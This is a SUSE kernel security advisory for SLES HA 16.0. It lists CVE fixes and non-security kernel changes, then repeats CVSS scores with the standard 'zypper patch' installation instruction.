- CVE-2025-68379: RDMA/rxe: Fix null deref on srq->rq.queue after resize failure (bsc#1255695).
- CVE-2025-68735: drm/panthor: Prevent potential UAF in group creation (bsc#1255811).
- CVE-2025-68741: scsi: qla2xxx: Fix improper freeing of purex item (bsc#1255703).
- CVE-2025-68743: mshv: Fix create memory region overlap check (bsc#1255708).
- CVE-2025-68764: NFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags (bsc#1255930).
- CVE-2025-68768: inet: frags: add inet_frag_queue_flush() (bsc#1256579).
- CVE-2025-68770: bnxt_en: Fix XDP_TX path (bsc#1256584).
- CVE-2025-68771: ocfs2: fix kernel BUG in ocfs2_find_victim_chain (bsc#1256582).
- CVE-2025-68775: net/handshake: duplicate handshake cancellations leak socket (bsc#1256665).
- CVE-2025-68776: net/hsr: fix NULL pointer dereference in prp_get_untagged_frame() (bsc#1256659).
- CVE-2025-68784: xfs: fix a UAF problem in xattr repair (bsc#1256793).
- CVE-2025-68788: fsnotify: do not generate ACCESS/MODIFY events on child for special files (bsc#1256638).
- CVE-2025-68792: tpm2-sessions: Fix out of range indexing in name_size (bsc#1256656).
- CVE-2025-68795: ethtool: Avoid overflowing userspace buffer on stats query (bsc#1256688).
- CVE-2025-68798: perf/x86/amd: Check event before enable to avoid GPF (bsc#1256689).
- CVE-2025-68799: caif: fix integer underflow in cffrml_receive() (bsc#1256643).
- CVE-2025-68800: mlxsw: spectrum_mr: Fix use-after-free when updating multicast route stats (bsc#1256646).
- CVE-2025-68801: mlxsw: spectrum_router: Fix neighbour use-after-free (bsc#1256653).
- CVE-2025-68803: NFSD: NFSv4 file creation neglects setting ACL (bsc#1256770).
- CVE-2025-68811: svcrdma: use rc_pageoff for memcpy byte offset (bsc#1256677).
- CVE-2025-68813: ipvs: fix ipv4 null-ptr-deref in route error path (bsc#1256641).
- CVE-2025-68814: io_uring: fix filename leak in __io_openat_prep() (bsc#1256651).
- CVE-2025-68815: net/sched: ets: Remove drr class from the active list if it changes to strict (bsc#1256680).
- CVE-2025-68816: net/mlx5: fw_tracer, Validate format string parameters (bsc#1256674).
- CVE-2025-68820: ext4: xattr: fix null pointer deref in ext4_raw_inode() (bsc#1256754).
- CVE-2025-68821: fuse: fix readahead reclaim deadlock (bsc#1256667).
- CVE-2025-71064: net: hns3: using the num_tqps in the vf driver to apply for resources (bsc#1256654).
- CVE-2025-71066: net/sched: ets: Always remove class from active list before deleting in ets_qdisc_change (bsc#1256645).
- CVE-2025-71077: tpm: Cap the number of PCR banks (bsc#1256613).
- CVE-2025-71080: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT (bsc#1256608).
- CVE-2025-71084: RDMA/cm: Fix leaking the multicast GID table reference (bsc#1256622).
- CVE-2025-71085: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (bsc#1256623).
- CVE-2025-71087: iavf: fix off-by-one issues in iavf_config_rss_reg() (bsc#1256628).
- CVE-2025-71088: mptcp: fallback earlier on simult connection (bsc#1256630).
- CVE-2025-71089: iommu: disable SVA when CONFIG_X86 is set (bsc#1256612).
- CVE-2025-71091: team: fix check for port enabled in team_queue_override_port_prio_changed() (bsc#1256773).
- CVE-2025-71093: e1000: fix OOB in e1000_tbi_should_accept() (bsc#1256777).
- CVE-2025-71094: net: usb: asix: ax88772: Increase phy_name size (bsc#1256597).
- CVE-2025-71095: net: stmmac: fix the crash issue for zero copy XDP_TX action (bsc#1256605).
- CVE-2025-71097: ipv4: Fix reference count leak when using error routes with nexthop objects (bsc#1256607).
- CVE-2025-71098: ip6_gre: make ip6gre_header() robust (bsc#1256591).
- CVE-2025-71112: net: hns3: add VLAN id validation before using (bsc#1256726).
- CVE-2025-71116: libceph: make decode_pool() more resilient against corrupted osdmaps (bsc#1256744).
- CVE-2025-71120: SUNRPC: svcauth_gss: avoid NULL deref on zero length gss_token in gss_read_proxy_verf (bsc#1256779).
- CVE-2025-71123: ext4: fix string copying in parse_apply_sb_mount_options() (bsc#1256757).
- CVE-2025-71126: mptcp: avoid deadlock on fallback while reinjecting (bsc#1256755).
- CVE-2025-71132: smc91x: fix broken irq-context in PREEMPT_RT (bsc#1256737).
- CVE-2025-71133: RDMA/irdma: avoid invalid read in irdma_net_event (bsc#1256733).
- CVE-2025-71135: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() (bsc#1256761).
- CVE-2025-71137: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" (bsc#1256760).
- CVE-2025-71148: net/handshake: restore destructor on submit failure (bsc#1257159).
- CVE-2025-71149: io_uring/poll: correctly handle io_poll_add() return value on update (bsc#1257164).
- CVE-2025-71156: gve: defer interrupt enabling until NAPI registration (bsc#1257167).
- CVE-2025-71157: RDMA/core: always drop device refcount in ib_del_sub_device_and_put() (bsc#1257168).
- CVE-2026-22976: net/sched: sch_qfq: Fix NULL deref when deactivating inactive aggregate in qfq_reset (bsc#1257035).
- CVE-2026-22977: net: sock: fix hardened usercopy panic in sock_recv_errqueue (bsc#1257053).
- CVE-2026-22981: idpf: detach and close netdevs while handling a reset (bsc#1257225).
- CVE-2026-22982: net: mscc: ocelot: Fix crash when adding interface under a lag (bsc#1257179).
- CVE-2026-22984: libceph: prevent potential out-of-bounds reads in handle_auth_done() (bsc#1257217).
- CVE-2026-22986: gpiolib: fix race condition for gdev->srcu (bsc#1257276).
- CVE-2026-22990: libceph: replace overzealous BUG_ON in osdmap_apply_incremental() (bsc#1257221).
- CVE-2026-22991: libceph: make free_choose_arg_map() resilient to partial allocation (bsc#1257220).
- CVE-2026-22992: libceph: return the handler error from mon_handle_auth_done() (bsc#1257218).
- CVE-2026-22993: idpf: Fix RSS LUT NULL pointer crash on early ethtool operations (bsc#1257180).
- CVE-2026-22996: net/mlx5e: Don't store mlx5e_priv in mlx5e_dev devlink priv.
- CVE-2026-22999: net/sched: sch_qfq: do not free existing class in qfq_change_class() (bsc#1257236).
- CVE-2026-23000: net/mlx5e: Fix crash on profile change rollback failure (bsc#1257234).
- CVE-2026-23001: macvlan: fix possible UAF in macvlan_forward_source() (bsc#1257232).
- CVE-2026-23005: x86/fpu: Clear XSTATE_BV in guest XSAVE state whenever XFD[i]=1 (bsc#1257245).
- CVE-2026-23011: ipv4: ip_gre: make ipgre_header() robust (bsc#1257207).
The following non security issues were fixed:
- ALSA: usb-audio: Update for native DSD support quirks (stable-fixes).
- Add bugnumber to an existing hv_netvsc change (bsc#1257473).
- Fix locking issue introduced by a CVE backport (bsc#1256975 bsc#1254977).
- Update config files: disable CONFIG_DEVPORT for arm64 (bsc#1256792)
- arm64: Update config files. Disable DEVPORT (bsc#1256792)
- bpf/selftests: test_select_reuseport_kern: Remove unused header (bsc#1257603).
- bpf: Do not let BPF test infra emit invalid GSO types to stack (bsc#1255569).
- btrfs: pass fs_info to btrfs_delete_ref_head() (git-fixes).
- btrfs: scrub: always update btrfs_scrub_progress::last_physical (git-fixes).
- bus: fsl-mc: Constify fsl_mc_device_match() (jsc#PED-10906 git-fixes).
- drm/imagination: Wait for FW trace update command completion (git-fixes).
- drm/msm/a6xx: fix bogus hwcg register updates (git-fixes).
- ice: use netif_get_num_default_rss_queues() (bsc#1247712).
- libbpf: Fix -Wdiscarded-qualifiers under C23 (bsc#1257309).
- mm, page_alloc, thp: prevent reclaim for __GFP_THISNODE THP allocations (bsc#1254447 bsc#1253087).
- net: mana: Fix incorrect speed reported by debugfs (bsc#1255232).
- net: mana: Support HW link state events (bsc#1253049).
- nfsd: adjust WARN_ON_ONCE in revoke_delegation (bsc#1257015).
- nvme: nvme-fc: move tagset removal to nvme_fc_delete_ctrl() (git-fixes).
- powerpc/addnote: Fix overflow on 32-bit builds (bsc#1215199).
- sched/fair: Disable scheduler feature NEXT_BUDDY (bsc#1255459).
- scsi: lpfc: Rework lpfc_sli4_fcf_rr_next_index_get() (bsc#1256864).
- scsi: lpfc: Update lpfc version to 14.4.0.13 (bsc#1256864).
- scsi: qla2xxx: Add Speed in SFP print information (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add bsg interface to support firmware img validation (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add load flash firmware mailbox support for 28xxx (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Add support for 64G SFP speed (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Allow recovery for tape devices (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Delay module unload while fabric scan in progress (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Fix bsg_done() causing double free (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Free sp in error path to fix system crash (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Query FW again before proceeding with login (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Update version to 10.02.10.100-k (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate MCU signature before executing MBC 03h (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: qla2xxx: Validate sp before freeing associated memory (bsc#1256865 bsc#1256867 jsc#PED-14156).
- scsi: storvsc: Process unsupported MODE_SENSE_10 (bsc#1257296).
- selftests: net: fib-onlink-tests: Convert to use namespaces by default (bsc#1255346).
- slimbus: core: Constify slim_eaddr_equal() (jsc#PED-10906 git-fixes).
- smb: client: split cached_fid bitfields to avoid shared-byte RMW races (bsc#1250748,bsc#1257154).
- smb: client: update cfid->last_access_time in open_cached_dir_by_dentry() (git-fixes).
- smb: improve directory cache reuse for readdir operations (bsc#1252712).
- tsm-mr: Add TVM Measurement Register support (bsc#1257504).
- tsm-mr: Add tsm-mr sample code (bsc#1257504).
- virt: tdx-guest: Expose TDX MRs as sysfs attributes (bsc#1257504).
- virt: tdx-guest: Refactor and streamline TDREPORT generation (bsc#1257504).
- virt: tdx-guest: Transition to scoped_cond_guard for mutex operations (bsc#1257504).
- wifi: mwifiex: Fix a loop in mwifiex_update_ampdu_rxwinsize() (git-fixes).
- x86/tdx: Add tdx_mcall_extend_rtmr() interface (bsc#1257504).
- x86/tdx: tdx_mcall_get_report0: Return -EBUSY on TDCALL_OPERAND_BUSY error (bsc#1257504).
Patchnames: SUSE-SLES-HA-16.0-325
Terms of use: CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.8 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.8 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.9 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
4.7 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.4 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.6 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.1 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.3 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
7.5 (High)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
6.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".
5.5 (Medium)
Vendor Fix
